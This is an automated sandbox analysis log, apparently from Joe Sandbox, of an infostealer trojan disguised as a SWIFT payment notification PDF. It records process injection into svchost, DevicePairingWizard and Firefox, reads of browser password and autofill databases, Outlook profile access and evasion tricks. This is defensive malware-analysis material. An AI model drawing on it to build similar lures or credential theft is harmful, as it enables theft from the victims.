Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461F6F6	12_2_0461F6F6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045D36EC	12_2_045D36EC
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0456B0D0	12_2_0456B0D0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_046170F1	12_2_046170F1
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0459508C	12_2_0459508C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045A717A	12_2_045A717A
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0454F113	12_2_0454F113
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045FD130	12_2_045FD130
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045651C0	12_2_045651C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0457B1E0	12_2_0457B1E0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461124C	12_2_0461124C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0454D2EC	12_2_0454D2EC
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461F330	12_2_0461F330
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04551380	12_2_04551380
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04563C60	12_2_04563C60
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045E7CE8	12_2_045E7CE8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0457FCE0	12_2_0457FCE0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045F9C98	12_2_045F9C98
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04617D4C	12_2_04617D4C
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461FD27	12_2_0461FD27
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04569DD0	12_2_04569DD0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045FFDF4	12_2_045FFDF4
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04619ED2	12_2_04619ED2
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04561EB2	12_2_04561EB2
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461FF63	12_2_0461FF63
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045DFF40	12_2_045DFF40
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04611FC6	12_2_04611FC6
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461F872	12_2_0461F872
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04569870	12_2_04569870
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0457B870	12_2_0457B870
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045D5870	12_2_045D5870
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_04563800	12_2_04563800
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_046178F3	12_2_046178F3
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_046118DA	12_2_046118DA
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045D98B2	12_2_045D98B2
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045A59C0	12_2_045A59C0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045299E8	12_2_045299E8
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461FA89	12_2_0461FA89
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0457FAA0	12_2_0457FAA0
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0459DB19	12_2_0459DB19
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0461FB2E	12_2_0461FB2E
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_045F1B80	12_2_045F1B80
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441EFCA	12_2_0441EFCA
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441E413	12_2_0441E413
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441E7AC	12_2_0441E7AC
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441E2F4	12_2_0441E2F4
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441D878	12_2_0441D878
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: 12_2_0441CB03	12_2_0441CB03

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BEF10 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287BE4 appears 96 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B910 appears 268 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AE692 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275050 appears 36 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 045CE692 appears 86 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 04595050 appears 56 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 0454B910 appears 275 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 045A7BE4 appears 99 times
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Code function: String function: 045DEF10 appears 105 times
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: String function: 00445AE0 appears 65 times

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004493000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.908228057.000000000468D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@17/11

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0044AF6C GetLastError,FormatMessageW,

0_2_0044AF6C

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		0_2_004333BE
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		0_2_00464EAE

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,

0_2_0045D619

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_004755C4

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0047839D

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0043305F FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

0_2_0043305F

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

File created: C:\Users\user\AppData\Local\Temp\autA0F7.tmp

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.0000000007789000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: DevicePairingWizard.exe, 0000000C.00000003.1625784978.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1622047389.000000000088C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1621886723.000000000086C000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1626735985.000000000088C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077EE000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5057040263.00000000077E0000.00000004.00000020.00020000.00000000.sdmp, c104-9J-L.12.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

ReversingLabs: Detection: 35%

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

File read: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Source: unknown	Process created: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Process created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Process created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Switches to a custom stack to bypass stack traces

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nmlZZxePqIALDF.exe, 0000000B.00000000.1368079590.0000000000B3E000.00000002.00000001.01000000.00000007.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1511410992.0000000000B3E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.906520048.0000000004560000.00000004.00001000.00020000.00000000.sdmp, Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004370000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1354730336.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1352046596.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.000000000332D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.000000000464D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1445676504.00000000041CF000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.0000000004520000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1448512086.0000000004378000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.906520048.0000000004560000.00000004.00001000.00020000.00000000.sdmp, Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004370000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1442164263.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1354730336.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1352046596.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.000000000332D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, DevicePairingWizard.exe, 0000000C.00000002.5054689691.000000000464D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1445676504.00000000041CF000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.0000000004520000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1448512086.0000000004378000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DevicePairingWizard.pdb source: svchost.exe, 00000002.00000003.1410633669.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1410879115.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000003.4818771537.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1733921214.000000002529C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1733921214.000000002529C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: DevicePairingWizard.pdbGCTL source: svchost.exe, 00000002.00000003.1410633669.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1410879115.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000003.4818771537.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,

0_2_0040EBD0

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Static PE information: real checksum: 0xa961f should be: 0xefad5

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00416CB5 push ecx; ret	0_2_00416CC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0052D830 push 057A7DD9h; ret	2_2_0052D835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_005388A9 push ds; iretd	2_2_005388B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0053AB5D push 21F2DB1Dh; retf	2_2_0053AB62
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0053837D push eax; ret	2_2_0053837E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0053AB23 push eax; iretd	2_2_0053AB4D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_005233A0 push eax; ret	2_2_005233A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00534C56 push cs; ret	2_2_00534C59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0052A563 push ebx; retn 8399h	2_2_0052A6EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0053ED86 push ecx; retf	2_2_0053ED87
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00531F1D push esp; ret	2_2_00531F1E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032021AD pushad ; retf 0004h	2_2_0320223F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032097A1 push es; iretd	2_2_032097A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032308CD push ecx; mov dword ptr [esp], ecx	2_2_032308D6
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02CFE6A4 push CF35D0C2h; retn 35D0h	11_2_02CFE6A5
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02CFE6A4 push esp; iretd	11_2_02CFE6F7
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02CFE6A4 push eax; retf 9681h	11_2_02CFE775
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D0FADD push ecx; retf	11_2_02D0FADE
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D090D4 push eax; ret	11_2_02D090D5
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D0B8B4 push 21F2DB1Dh; retf	11_2_02D0B8B9
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D0B87A push eax; iretd	11_2_02D0B8A4
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D059AD push cs; ret	11_2_02D059B0
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D09600 push ds; iretd	11_2_02D0960F
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02CF94AB push 00000045h; iretd	11_2_02CF94AE
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02D02C74 push esp; ret	11_2_02D02C75
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Code function: 11_2_02CFE587 push 057A7DD9h; ret	11_2_02CFE58C
